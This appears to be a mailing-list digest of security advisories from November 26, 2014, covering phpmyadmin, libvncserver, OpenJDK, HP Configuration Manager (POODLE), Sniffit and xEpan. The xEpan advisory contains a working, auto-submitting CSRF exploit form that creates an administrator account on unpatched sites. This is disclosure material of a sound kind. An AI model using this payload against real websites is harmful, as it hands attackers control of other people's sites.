[ MDVSA-2014:228 ] phpmyadmin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:228 http://www.mandriva.com/en/support/security/ ___ Package : phpmyadmin Date: November 26, 2014 Affected: Business Server 1.0 ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in phpmyadmin: * Multiple XSS vulnerabilities (CVE-2014-8958). * Local file inclusion vulnerability (CVE-2014-8959). * XSS vulnerability in error reporting functionality (CVE-2014-8960). * Leakage of line count of an arbitrary file (CVE-2014-8961). This upgrade provides the latest phpmyadmin version (4.2.12) to address these vulnerabilities. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8958 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8959 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8960 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8961 http://sourceforge.net/p/phpmyadmin/news/ http://www.phpmyadmin.net/home_page/security/PMASA-2014-13.php http://www.phpmyadmin.net/home_page/security/PMASA-2014-14.php http://www.phpmyadmin.net/home_page/security/PMASA-2014-15.php http://www.phpmyadmin.net/home_page/security/PMASA-2014-16.php ___ Updated Packages: Mandriva Business Server 1/X86_64: a26cba13ad8856065de5ae22b227a412 mbs1/x86_64/phpmyadmin-4.2.12-1.mbs1.noarch.rpm dd54c97cc8270cc791332c1568859024 mbs1/SRPMS/phpmyadmin-4.2.12-1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFUdY/pmqjQ0CJFipgRAjsEAKDZeZaGjzJj8qryzSNnu1owQUqfxACg7Pr/ FBJNaxzlv6CW2wqzHnt8UGo= =YOT0 -END PGP SIGNATURE-
Сross-Site Request Forgery (CSRF) in xEpan
Advisory ID: HTB23240 Product: xEpan Vendor: Xavoc Technocrats Pvt. Ltd. Vulnerable Version(s): 1.0.1 and probably prior Tested Version: 1.0.1 Advisory Publication: October 22, 2014 [without technical details] Vendor Notification: October 22, 2014 Public Disclosure: November 26, 2014 Vulnerability Type: Cross-Site Request Forgery [CWE-352] CVE Reference: CVE-2014-8429 Risk Level: Medium CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) Solution Status: Not Fixed Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in xEpan, which can be exploited to compromise vulnerable web site. 1) Сross-Site Request Forgery (CSRF) in xEpan: CVE-2014-8429 The vulnerability exists due to insufficient validation of the HTTP request origin when creating new user accounts. A remote unauthenticated attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit, create new account with administrative privileges and get total control over the vulnerable website. A simple CSRF exploit below creates an administrative account with username immuniweb and password password: form action=http://[host]/?page=owner/usersweb_owner_users_crud_virtualpage=addsubmit=web_web_owner_users_crud_virtualpage_form; method=post name=main input type=hidden name=web_web_owner_users_crud_virtualpage_form_name value=name input type=hidden name=web_web_owner_users_crud_virtualpage_form_email value=em...@email.com input type=hidden name=web_web_owner_users_crud_virtualpage_form_username value=immuniweb input type=hidden name=web_web_owner_users_crud_virtualpage_form_password value=password input type=hidden name=web_web_owner_users_crud_virtualpage_form_created_at value=21/10/2014 input type=hidden name=web_web_owner_users_crud_virtualpage_form_type value=100 input type=hidden name=web_web_owner_users_crud_virtualpage_form_is_active value=1 input type=hidden name=web_web_owner_users_crud_virtualpage_form_activation_code value= input type=hidden name=web_web_owner_users_crud_virtualpage_form_last_login_date value= input type=hidden name=ajax_submit value=form_submit input type=submit id=btn /form script document.main.submit(); /script --- Solution: Currently we are not aware of any official solution for this vulnerability. bDisclosure timeline:/b 2014-10-22 Vendor notified via several emails. 2014-10-22 Vendor denies vulnerability. 2014-11-06 Vulnerability is confirmed in the latest version of xEpan 1.0.4 which was released on the 2nd of November (we initially suspected a silent fix). 2014-11-06 Vulnerability confirmed in 1.0.4 as well. Vendor notified about the problem once again. 2014-11-10 Fix requested via several emails. 2014-11-17 Fix requested via several emails. 2014-11-24 Fix requested via several emails. 2014-11-24 Vulnerability still exist in latest version 1.0.4.1 which was released at November, 20. 2014-11-26 Public disclosure. --- References: [1] High-Tech Bridge Advisory HTB23240 - https://www.htbridge.com/advisory/HTB23240 - Сross-Site Request Forgery (CSRF) in xEpan. [2] xEpan - http://www.xepan.org/ - xEpan is a an open source content management system (CMS) with Drag amp; Drop, bootstrap and live text editing. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
CVE-2014-5439 - Root shell on Sniffit [with exploit]
CVE-2014-5439 - Root shell on Sniffit Sniffit is a packet sniffer and monitoring tool. The attacker can create a specially-crafted sniffit configuration file, which is able to bypass all three protection mechanisms: - Non-eXecutable bit NX - Stack Smashing Protector SSP - Address Space Layout Randomisation ASLR And execute arbitrary code with root privileges. Exploit, fix and discussion in: http://hmarco.org/bugs/CVE-2014-5439-sniffit_0.3.7-stack-buffer-overflow.html Regards, Hector Marco. http://hmarco.org Cybersecurity researcher at: http://cybersecurity.upv.es/
[ MDVSA-2014:229 ] libvncserver
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:229 http://www.mandriva.com/en/support/security/ ___ Package : libvncserver Date: November 26, 2014 Affected: Business Server 1.0 ___ Problem Description: Updated libvncserver packages fix security vulnerabilities: A malicious VNC server can trigger incorrect memory management handling by advertising a large screen size parameter to the VNC client. This would result in multiple memory corruptions and could allow remote code execution on the VNC client (CVE-2014-6051, CVE-2014-6052). A malicious VNC client can trigger multiple DoS conditions on the VNC server by advertising a large screen size, ClientCutText message length and/or a zero scaling factor parameter (CVE-2014-6053, CVE-2014-6054). A malicious VNC client can trigger multiple stack-based buffer overflows by passing a long file and directory names and/or attributes (FileTime) when using the file transfer message feature (CVE-2014-6055). Additionally libvncserver has been built against the new system minilzo library which is also being provided with this advisory. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6051 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6052 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6053 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6054 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6055 http://advisories.mageia.org/MGASA-2014-0397.html ___ Updated Packages: Mandriva Business Server 1/X86_64: 4d938f964a86df6c1fb2aad9342db1e3 mbs1/x86_64/lib64lzo2_2-2.08-1.1.mbs1.x86_64.rpm 676ed246f1587fb815620e42a2e64e9a mbs1/x86_64/lib64lzo-devel-2.08-1.1.mbs1.x86_64.rpm d04fc1fb9b16142be0111f5efb276967 mbs1/x86_64/lib64minilzo0-2.08-1.1.mbs1.x86_64.rpm 84f52d51b3a28e5eecd8b0f7dd3c3b65 mbs1/x86_64/lib64vncserver0-0.9.9-1.mbs1.x86_64.rpm 50d5bf0cdff71f9773d07bfee2804eaf mbs1/x86_64/lib64vncserver-devel-0.9.9-1.mbs1.x86_64.rpm 70da4fa0a7eb955f45ed1fcd6fd4ca19 mbs1/x86_64/linuxvnc-0.9.9-1.mbs1.x86_64.rpm da9cbd99e5f15bbe8a0185e044b60c13 mbs1/SRPMS/liblzo-2.08-1.1.mbs1.src.rpm 6cf01a7cb6d388558f73d059340ed3da mbs1/SRPMS/libvncserver-0.9.9-1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFUdetlmqjQ0CJFipgRAtlsAJ9r8QqdTvbKu4NxWu5NjuMprs3u9QCfXHiW WAB/W3mvRmbb1VP4c88JjTI= =Yn8M -END PGP SIGNATURE-
[SECURITY] [DSA 3077-1] openjdk-6 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-3077-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff November 26, 2014 http://www.debian.org/security/faq - - Package: openjdk-6 CVE ID : CVE-2014-6457 CVE-2014-6502 CVE-2014-6504 CVE-2014-6506 CVE-2014-6511 CVE-2014-6512 CVE-2014-6517 CVE-2014-6519 CVE-2014-6531 CVE-2014-6558 Several vulnerabilities have been discovered in OpenJDK, an implementation of the Oracle Java platform, resulting in the execution of arbitrary code, information disclosure or denial of service. For the stable distribution (wheezy), these problems have been fixed in version 6b33-1.13.5-2~deb7u1. We recommend that you upgrade your openjdk-6 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJUdiUoAAoJEBDCk7bDfE42LNEQAK4tVOH/Y6Rgc7psnAB7haNH gG4sTVa+oBUqSxopN/JODAJzDrpEUCrHTiBBnj6PFReW7ab8rOyv5LNxq9qkq5D8 W1iFq1mVuSXc7BKGWCu4TMmZVc9Tkvp8mhsvJVxEorv0Q+q3+3ESrSZ97s06+Zh7 nqZWcihs4M2RtshYl8y6nFAfFN8s12xJ9xECECihSEP+TnRFwYlERND1pXXrzhUX P1VUgw5jXRD7DUoAUiIf+EIU4J4bF6NI51Eh+mR4mJAZLiNtVMtKkA1c6kusda/w ZDN0hjB8sMgGWP4dIxthYQV1ux4mEAtDzvf427l2b4Zuc5a6WCzcZEvkJ7QxQFlx YbT29bNWigBsu3WH1Etpj5GWDxISRQVW+wWsJHXA18d5dCti00hAnjbpVZbPkkUJ B05LNvt7TBzqWWKa416BQDDFy/n/pFn0EFUR6/HCTBpzqBqWOSrqZgjzX5Dvnbd7 YnPH0f9LsU/ir0u57tynmzyApNEW+YmRmAr/4CCM6asvKzPZWrVNFwUxGHE/e+lI uZ0gWvq7Vr0RyYmFeZwIG+sE1HJvx8rFgbZ0DnLglyrD3cgg5DJ0inNZdHCllfJo 6ennGTgsTsdArJMProwVGlB2uGwW3EZRbJyz5Ol1jAtPLkrIGT4ujW5d7yfduout voLnaEPtqnXoPlEz9A0c =GU24 -END PGP SIGNATURE-
[security bulletin] HPSBGN03202 rev.1 - HP CMS: Configuration Manager running OpenSSL, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04507568 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04507568 Version: 1 HPSBGN03202 rev.1 - HP CMS: Configuration Manager running OpenSSL, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-11-26 Last Updated: 2014-11-26 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP CMS: Configuration Manager running OpenSSL. This is the SSLv3 vulnerability known as Padding Oracle on Downgraded Legacy Encryption also known as Poodle, which could be exploited remotely to allow disclosure of information. References: CVE-2014-3566 (SSRT101842) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Configuration Manager all supported versions. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-3566(AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made the following instructions available to resolve the vulnerability in HP Configuration Manager: https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facets earch/document/KM01235504 HISTORY Version:1 (rev.1) - 26 November 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlR2CL4ACgkQ4B86/C0qfVmxSwCfUGcNArFjaj69xvwAX/W5McUc mgcAniGIrXK6xEo5rnsfXvI44f3qY62R =NiLb -END PGP SIGNATURE-